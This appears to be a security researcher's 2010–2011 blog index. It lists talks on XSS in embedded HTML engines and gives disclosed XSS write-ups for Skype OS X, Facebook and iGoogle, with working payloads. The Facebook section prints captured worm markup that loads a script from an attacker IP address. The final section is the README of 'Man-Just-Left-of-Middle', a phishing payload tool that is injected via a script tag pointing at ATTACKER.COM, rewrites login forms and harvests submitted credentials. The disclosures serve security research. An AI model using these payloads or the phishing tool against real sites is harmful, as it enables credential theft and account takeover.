Presented at BlackHat USA 2011, BSidesLV 2011, and Defcon 19 (2011). WhitePaper:
Presentation Slides:
Video after the break.
Read the rest of this entry »
The Hidden XSS Attacking the Desktop & Mobile Platforms – Slides & Video
7 October 9th, 2011A few weeks ago (October 2th) I was in Louisville, Kentucky, giving a talk at Derbycon. I also gave the same talk in San Diego (October 9th) at Toorcon 13. It’s a much expanded version of a talk I did back in June at Toorcon Seattle, “XSS Without the Browser”.
Slides are below, and video is after the break. The slides are a bit different than the video. I modified, reordered, and added a few slides, and also included a new Google application vulnerability.
Toorcon Seattle 2011, “XSS Without the Browser”
0 June 19th, 2011Toorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/Javascript engines, and potential security risks with whe not implemented securely. An old Skype bug is used as an example.
Skype OS X Cross-Site Scripting Vulnerability
0 June 18th, 2011Vulnerability: Cross Site Scripting
Affects: Skype 5.0.x to <= 5.0.914 (OS X) (Download | Local Mirror)
Skype (http://skype.com/) was vulnerable to (persistent?) XSS via messages from other users.
On top of that, the DOM of this window does not contain a set Origin, so it is possible to "bypass" the cross origin policy.
Authentication Status: Logged into skype, but persists in logs,
so a user can be exploited again if viewing logs. Default privacy
settings require a user to add the attacker as a contact.
so a user can be exploited again if viewing logs. Default privacy
settings require a user to add the attacker as a contact.
Attribution:
- April 6th, 2011 – Andrew van der Stock (@vanderaj). Originally discovered and disclosed to Skype.
- May 7th, 2011 – Skype IM (MAC OS X) – Is this the 0day ?
Inject used in attack
http://kos.io/"><script>alert(1)</script>
More advanced attacks:
Facebook XSS
0 April 6th, 2011Some cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a BURP instance beforehand. (Red link is to the actual javascript that sent out messages.)
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.144.114.105
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182
*SNIP*
<div>
<div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
<div>
<a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
</div>
<div>
<h2>Videos Posted by Maria Gonzales</h2>
<div>
<div>
</div>
</div>
</div>
</div>
<div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
<a href=" javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement('script')).src='[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; window.close(); }else{ document.body.appendChild(document.createElement('script')).src='[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous'; }" target="_blank" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
</div>
<div id="app205712022786034_video_info" fbcontext="dc593d496581">
<div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
<h3>Teacher Pushes Attacking Bully To The Ground</h3>
<div>
by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">videos</a>)
</div>
<div>
<strong>2:30</strong><br /><br />
</div>
</div>
<div id="app205712022786034_description" fbcontext="dc593d496581">
<div>
He should be commended, but sadly, in todays world, he'll probably get in trouble.
</div>
</div>
<a role="button" href="/ajax/share_dialog.php?s='11&appid=2392950137&p[]=487808128343&p[]=&p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;"><span>Share</span></a>
<div id="app205712022786034_video_actions" fbcontext="dc593d496581">
<ul>
<li>
<div>
<a href="#" id="app205712022786034_lowqual_toggle" title="watch "bonaparte - menschen live (video) [hd]" in regular quality." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;" fbcontext="dc593d496581">
View in Regular Quality</a>
</div>
<a href="#" id="app205712022786034_highqual_toggle" title="watch "bonaparte - menschen live (video) [hd]" in high quality." onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
</li>
<li><a href="/ajax/report.php?content_type='13&cid=487808128343&h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = '/ajax/ct.php?app_id=205712022786034&action_type=3&post_form_id=60e2f9386c8e446297b44bb16477472b&position=3&' + Math.random();return true;">Report Video</a></li>
</ul>
</div>
</div>
*SNIP*
Hacking Google – Part 2
0 December 16th, 2010Vulnerability: Cross Site Scripting
Affects: Any browser that supports javascript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.
iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.
Authentication Status: both unauth and auth
URL used in attack
http://www.google.com/ig
Payload:
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1
{"title":"test","author":"test","description":"","skin":
[{"background_image":"');}body{background-image:expression(alert(document.domain));
-o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
"background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
"gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
"tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}
How it’s reflected on the page:
When the iGoogle page is loaded, if theme (which is attached to a tab) is selected, it will trigger instantly.
If the tab is not selected, if a user selects the tab, it will then trigger.
GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1
....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....
The Danger
A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.
Resolution
This issue was resolved in about a week.
Hacking Google – Part 1
0 December 16th, 2010Vulnerability: Cross Site Scripting
Affects: all browsers.
iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.
Authentication Status: both unauth and auth
URL used in attack
http://www.google.com/ig/adde?moduleurl=attacker.com/payload.xml&source=lpep&mkhp=0
attacker.com/payload.xml:
<ModulePrefs author="Kyle" author_email=""
description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
screenshot="http://www.google.com/images/firefox/sprite2.png"
title_url="javascript:alert(document.domain);" title="[TITLE OF GADGET]" height="165">
<Require feature="setprefs" />
<Require feature="views" />
<Require feature="dynamic-height" />
....
</ModulePrefs>
How it’s reflected on the page:
.... <a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a> .... (The "Hax" string below is the title of the gadget, which was what the reflected link above is)
Resolution
This issue was resolved very quickly.
Google now just replaces anything that doesn’t have a protocol of http or https with the path the file is hosted on.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/
Man-Just-Left-of-Middle
0 March 14th, 2010Man-Just-Left-of-Middle
MJLM
XSS Phishing Attack Tool.
This README applies specifically to the PHP version of this script.
There is a Python version which acts the same, but has XML logging.
The Python version does not yet have the same options as the PHP version.
## Explanation
This is not an exploit tool, it’s more of a payload tool.
Once you’ve found the exloit, and you’re able to inject javascript,
just stick this in there.
Basically…
<script src=”http://ATTACKER.COM/thebiz.php”>
You’re pretty much set.
## What exactly this does…
- The page is loaded with the script inconspicuously place.
- Once the script is hit, the script will look at the HTTP REFERER
- With the HTTP REFERER in hand, it uses get_file_contents() to fetch the URL [all that is supported at this thime, cURL and Socket will be added later]
- Since the server doesn’t have the authentication that the user does (presumably) the server is prompted with a an unauthenticated page, which often contains a form to login.
- All the returned data is filtered and escaped, making it possibly to embed it into javascript.
- As soon as the javascript, with the payload, is returned to the user, the browser replaces everything in <body> with what was returned within the javascript. Forms are then modified to have the onSubmit=”" functoin.
- When you submit, it loads an image with the input fields as get parameters. sleep() is called (it sucks, gotta replace it.)
## A few things
# Requirements
In php.ini
allow_url_fopen = On
For now. I’ll add in suport for cURL and Socket later.
Proper HTTP Referers sent by the victim. If this is spoofed, or disabled, there will be odd results.
Javascript my be enabled.
By default, the script will grab anything from $_POST and throw it in a file labeled “posts”
Create that file, make ir writeable, but non-readable. Right now there’s no functionality to
forward posts from the server spoofed page, but that will change in the future, and adding it
manually isn’t hard.
# Future plans
Expanded support for passing proper browser headers, instead of php headers.
cURL. Socket, because it’s probably faster.
Caching. (Save the page, then server that until X minutes/hours/days have passed, then recache it.)
# Anything else?
I suggest using .htaccess, or some other method, to slim down the URL.
|| RewriteRule ^a$ man-just-left-of-middle/thebiz.php
This will make http://ATTACKER.COM/a the script, and it will execute as normal, juts with a rewritten URL.
Will not work with URL redirection, because the HTTP referer is strippid.
Check the LICENSE file for licensing, GPLv2, etc etc.
WARNING: I have not completely bug tested this against vulns. I might have made a stupid mistake somewhere.
This is also doing some bandwidth intensive actoins (well, compared to none at all.)
Mileage may vary.
## Author
Kyle “Kos” Osborn
kyle@kyleosborn.com
http://kyleosborn.com/
@theKos